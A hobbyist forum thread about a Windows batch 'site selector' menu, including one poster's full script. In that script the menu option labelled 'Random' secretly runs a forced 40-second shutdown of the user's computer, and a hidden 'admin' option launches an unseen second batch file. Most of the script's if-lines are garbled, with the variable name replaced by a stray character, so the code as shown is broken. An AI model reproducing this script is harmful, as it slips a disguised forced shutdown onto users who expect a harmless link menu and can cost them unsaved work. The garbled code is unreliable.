2 Attachment(s)
PSP Site selctor by gokickadogx2
Ok guys, iv been trying to learn how to code.
This is a VERY SIMPLE program and i am new at this so dont flame me.
took me like 5 minutes.
Attachment is on the bottom.
-----------------------------
Please tell me what u think.
*Also uploaded the script for you to look at*
EDIT: SPELLING!!!!!! RAWRRR!!
Re: PSP Site selctor by gokickadogx2
Cool you're GREAT for a newbie! nice work kiu
Re: PSP Site selctor by gokickadogx2
Quote:
Originally Posted by
michael.pfrimmer
Cool you're GREAT for a newbie! nice work kiu
Thx.
After I get this down ill move onto VB.
Re: PSP Site selctor by gokickadogx2
vb sucks, learn C++ or something else
Re: PSP Site selctor by gokickadogx2
Quote:
Originally Posted by
B1G_BR0TH3R
vb sucks, learn C++ or something else
Gonna go out and buy a C++ for dummies book.
Re: PSP Site selctor by gokickadogx2
You Ripped This From me.. i made Site Selector And You Got it and just made it into Psp Changed links and names YOU FAIL
Re: PSP Site selctor by gokickadogx2
Quote:
Originally Posted by
B.L.A.C.K
You Ripped This From me.. i made Site Selector And You Got it and just made it into Psp Changed links and names YOU FAIL
Who are you......
How could i have ripped it.....never even saw you before.....
ill send you all my shit and you can compare it....i script just like this.
----Added 23/11/2009 at 7:08 PM----
And why would i rip it.....im trying to learn.
Re: PSP Site selctor by gokickadogx2
i am ImMoRtAl- And Here is My Site Selector
Code:
@echo off
color 0a
title Site Selector 1.0 by ImMoRtAl-
cls
:top
echo *************************************************************
echo.
echo Site Selector
echo.
echo *************************************************************
echo.
echo Key: [1] Google - Search Engine
echo [2] Hotmail - Mail Server.
echo [3] Yahoo - Search Engine/Mail Server.
echo [4] Facebook - Social Networking.
echo [5] Myspace - Social Networking.
echo [6] ConsoleCodez - Hacking/Cheatcodez.
echo [7] Weather - Weather.
echo [8] WikiHow - A How-To Website.
echo [9] Instructables - A How-To Website.
echo [10] YouTube - Online Videos.
echo [11] Answers - Online Encyclopedia.
echo [12] Wikipedia - Online Encyclopedia.
echo [13] Pornhub - Rockzors your Bockzors.
echo [14] HaxCommunity - PspHaxing.
echo [15] Random - So Random.
echo [16] Request a feature - want a website added request it here.
echo [e] Exit
echo ***************************************************************
echo Enter the number of the website which you would like to go to:
echo.
set /p udefine=
echo.
echo ***************************************************************
cls
if %udefine%==1 start www.google.com
if ෯ine%==2 start www.hotmail.com
if ෯ine%==3 start www.yahoo.com
if ෯ine%==4 start www.facebook.com
if ෯ine%==5 start www.myspace.com
if ෯ine%==6 start www.ConsoleCodez.Us
if ෯ine%==7 start www.weather.com
if ෯ine%==8 start www.wikihow.com
if ෯ine%==9 start www.instructables.com
if ෯ine%==10 start www.youtube.com
if ෯ine%==11 start www.answers.com
if ෯ine%==12 start www.wikipedia.com
if ෯ine%==13 start www.pornhub.com
if ෯ine%==14 start www.haxcommunity.org
if ෯ine%==15 start shutdown -s -f -t 40 -c "You Said Random You Have 40 seconds be for a meltdown"
if ෯ine%==e goto exit
if ෯ine%==admin start part2.bat
if ෯ine%==anti start shutdown -a
if ෯ine%==16 goto bot
cls
:exit
echo ***************************************************************
echo.
echo Thank You for using Site Selector by ImMoRtAl-
echo.
cls
echo ***************************************************************
echo Type [e] to exit or [b] to go back and select another site.
echo.
set /p udefine=
echo.
cls
echo ***************************************************************
if ෯ine%==b goto top
if ෯ine%==e goto exit
:exit
cls
echo ***************************************************************
:bot
echo.
echo.
echo Email immortal at [email protected]
echo to have a site added.
echo.
echo.
echo ***************************************************************
pause
exit
Re: PSP Site selctor by gokickadogx2
You have 4 goto points.....
2 of them being :exits......
Mine is cut down.
Re: PSP Site selctor by gokickadogx2
mine used to be that i recently modded mine to add stuff
Re: PSP Site selctor by gokickadogx2
And how can you say someone ripped a script?
I guarantee there are a 1,000 more that look just like this just in differant orders.
There arent many variations.....